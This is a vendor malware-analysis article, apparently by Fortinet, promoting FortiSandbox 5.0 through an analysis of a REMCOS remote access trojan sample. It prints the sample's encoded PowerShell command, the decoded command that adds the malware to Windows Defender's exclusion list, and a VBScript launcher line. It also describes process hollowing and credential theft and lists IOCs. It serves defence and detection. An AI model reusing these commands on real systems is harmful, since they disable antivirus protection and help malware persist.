Summary
In the ever-evolving landscape of cybersecurity, the ability to detect and analyze sophisticated malware behaviors becomes more critical than ever. FortiSandbox 5.0 (FSAv5) has significantly enhanced its capabilities with the integration of the PAIX engine and specialized hooks for .NET programs. These advancements empower security professionals to dissect malware with greater accuracy and to uncover behaviors that might otherwise remain concealed.
A recent demonstration of this capability involved the detection of REMCOS, a remote access trojan that enables attackers to gain unauthorized control over compromised systems. REMCOS can steal sensitive information, log keystrokes, and capture screenshots. This malware is often distributed through phishing emails or malicious downloads, employing obfuscation techniques to evade detection and maintain persistence on infected machines.
FortiSandbox plays a crucial role in identifying such threats by executing malware in a control environment that simulates real-world user interactions. This approach not only facilitates detailed behavioral analysis but also ensures that insights gained from these detections are shared across Fortinet’s Security Fabric. This article explores the innovative mechanisms of FSAv5 for identifying and understanding sophisticated malware threats like REMCOS, highlighting its vital contribution to modern cybersecurity defense strategies.
Analysis in FSAv5
The purpose of this article is to introduce the newly released FSAv5 and showcase its enhanced capabilities in detecting, analyzing, and documenting advanced malware. FSAv5 includes two key new features: the PAIX engine and improved detection for .NET programs.
The PAIX engine enables sophisticated static malware detection, allowing deeper insight into malicious code operations. Additionally, the enhanced .NET program analysis provides greater visibility into the behavior of this increasingly common malware vector. These advancements are demonstrated through an in-depth analysis of the REMCOS remote access trojan (RAT), known for its extensive data theft capabilities.
Visual aids, including an updated Tree View diagram (Figure 1), illustrate REMCOS’ full execution sequence. This chronological breakdown outlines the malware’s tactics and processes in detail, clearly highlighting how FSAv5’s new features identify and analyze complex, modern threats. By exploring REMCOS, this article aims at providing readers with an understanding of FSAv5’s role in defending against sophisticated malware.
Figure 1. Chain of execution provided by FSAv5
Additionally, suspicious indicators triggered during the analysis were recorded and categorized (Figure 2). This comprehensive documentation provides further context and aid in identifying potential malicious activities. With the enhancements in FSAv5, these indicators not only document the observed behaviors but also correlate them with specific MITRE ATT&CK techniques. This correlation provides a deeper understanding of the tactics employed by the malware.
Figure 2. FSAv5 updated indicators page
The newly integrated PAIX engine in FSAv5 performs static analysis, enabling it to detect the malware without the need to execute the code. By analyzing the malware’s code structure, embedded signatures and other static properties, the PAIX engine can identify potential threats efficiently. Figure 3 shows an example of PAIX engine detection on how FSAv5 can identify malicious elements within REMCOS malware through static analysis.
Figure 3. PAIX engine detection
In addition to the PAIX engine, FSAv5 introduces a new capability for analyzing .NET programs, a significant enhancement given the increasing prevalence of .NET-based malware. By tracing the invocation of .NET APIs, FSAv5 can provide insight into the specific operations and actions undertaken by the malware. This feature captures a wide range of API calls, revealing how the malware interacts with the system, manipulates data and executes malicious actions. Figure 4 demonstrates the .NET analysis in action for the REMCOS malware.
Figure 4. .NET APIs
When executed, REMCOS, begins by dropping a copy of itself into the %APPDATA% folder under the name “ApplicationTrustManager.exe” to avoid detection. After establishing itself in this directory, it proceeds to execute a base64-encoding string using PowerShell. The encoded command is as follows:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAHcAbwByAGsAXAA3ADQAMAAxADYAMwA1ADQANwA0ADIAMwA0ADEAOAAxADgAMwA0AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXAB3AG8AcgBrAFwANwA0ADAAMQA2ADMANQA0ADcANAAyADMANAAxADgAMQA4ADMANAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAGwAaQBjAGEAdABpAG8AbgBUAHIAdQBzAHQATQBhAG4AYQBnAGUAcgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQBwAHAAbABpAGMAYQB0AGkAbwBuAFQAcgB1AHMAdABNAGEAbgBhAGcAZQByAC4AZQB4AGUA
Once decoded, the command uses the Add-MpPreference cmdlet to add both the file path and process of ApplicationTrustManager.exe to Windows Defender’s exclusion list, which appears as follows:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Add-MpPreference -ExclusionPath REMCOS.exe; Add-MpPreference -ExclusionProcess REMCOS.exe; Add-MpPreference -ExclusionPath %AppData%\Roaming\ApplicationTrustManager.exe; Add-MpPreference -ExclusionProcess %AppData%\Roaming\ApplicationTrustManager.exe
By doing so, REMCOS effectively removes itself from real-time scanning and antivirus protections provided by Windows Defender, ensuring it can operate undetected and unhindered by the system’s security defenses.
Next, the malware runs a script named ApplicationTrustManager.vbs, which contains the following command to execute the REMCOS payload:
CreateObject("WScript.Shell").Run %AppData%\Roaming\ApplicationTrustManager.exe
This VBScript uses the WScript.Shell object to execute ApplicationTrustManager.exe from the %APPDATA%\Roaming
directory. REMCOS injects its malicious payload into a legitimate .NET process; in the observed sample, it targeted the InstallUtil.exe process. After sucessfully bypassing the previously mentioned security measures, REMCOS spawns the targeted .NET process in a suspeded state and then replaces its memory content with its own code using a technique known as process howllogin. This method conceals the malware’s presence, making it more challenging for traditional security tools to detect and remove. By embedding itself within a trusted process, REMCOS can operate under the radar while continuing its malicious activities. Figure 5 captures and logs this behavior as detected by FortiSandbox.
Figure 5. Targeted process for code injection
Upon gaining access to the victim’s machine, REMCOS executes a range of malicious activities, including keylogging, credential theft, remote surveillance and data exfiltration. It specifically targets popular web browsers like Opera, Firefox, and Chrome, aiming to intercept sensitive data such as login credentials, browsing history, and session cookies. Figure 6 and Figure 7 demonstrate examples of REMCOS’ credential theft and keylogging capabilities, respectively. Through these methods, REMCOS enables account compromise and intelligence gathering.
Figure 6. Credential theft capabilities
Figure 7. Keylogging capabilities
As illustrated in Figure 8, during the final attack phase, REMCOS establishes a connection to its command-and-control (C2) server using the identified URL. This communication channel enables threat actors to maintain persistent access to the compromised system, facilitating remote command execution and continuous data exfiltration.
Figure 8. Command-and-Control server
Conclusion
FortiSandbox serves as a crucial component in fortifying organizations against cyber threats by swiftly identifying and mitigating potential breaches. Through its seamless integration with Security Fabric platform products, FortiSandbox protects via inline scanning and enhances collaborative threat intelligence sharing, enabling rapid response to emerging threats.
MITRE ATT&CK
Note: The indicators in observed activity to each MITRE technique are relevant to analyzed campaigns and may change in future campaigns.
TA0002 – Execution
Technique ID |
Technique Description |
Observed Activity |
T1059.003 |
A process with suspicious extension was used through ApplicationTrustManager.vbs |
The script includes code that executes ApplicationTrustManager.exe using WScript |
TA0005 – Defense Evasion
Technique ID |
Technique Description |
Observed Activity |
T1562.001 |
A setting for Windows Defender was modified |
The file modified Windows Defender to exclude specified files from being scanned by real-time scans and antivirus protection provided by Windows Defender. |
T1027.010 |
A base64 encoded PowerShell code was executed |
REMCOS uses base64 encoding to obfuscate strings used for running PowerShell command |
T1055.012 |
A file %SYSTEM%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe in suspended mode was created |
REMCOS inject its payload into a legitimate .NET process InstallUtil.exe to evade detection |
T1036.005 |
A suspicious file ApplicationTrustManager.exe was installed in the %AppData% folder |
The malware drops a copy of itself into the %AppData% folder, it tries to give the drop file the name of a legitimate program. |
T1564.003 |
No visible window was observed |
When REMCOS executes, it uses a hidden window to conceal malicious activities from the user. |
TA0011 – Command and Control
Technique ID |
Technique Description |
Observed Activity |
T1571 |
A connection to a remote server with non-standard port was attempted |
Command-and-control server for REMCOS RAT, http://inforaservice[.]africa |
IOC
Indicator Description
|
Indicator |
Indicator Type |
Associated Tactic |
Notes |
First Observed |
Original file |
2dc2bbe21165e0ca5cdfc929e8f482b4 |
MD5 hash |
Installation |
Malicious PE file |
2024-11-05 |
ef7a86dcd2a4a94572cab689dacb848b8c12b9d56d941208ee390448ff6c4b10 |
SHA256 hash |
||||
Dropped file |
2dc2bbe21165e0ca5cdfc929e8f482b4 |
MD5 hash |
Installation |
Copy of the original file and placed onto %AppData% folder |
2024-11-05 |
ef7a86dcd2a4a94572cab689dacb848b8c12b9d56d941208ee390448ff6c4b10 |
SHA256 hash |
||||
Malicious websites |
URL |
Remote server |
REMCOS Command-and-Control (C2) server |
2024-11-05 |
Additional Resources
Further Reading on REMCOS Malware Analysis
- New Campaign Uses REMCOS RAT to Exploit Victims | FortiGuard Labs – This article by the FortiGuard team provides insights into detection techniques, command-and-control behaviors, and methods used by attackers. It complements the analysis presented here by discussing specific infection vectors, payload delivery tactics, and mitigation strategies.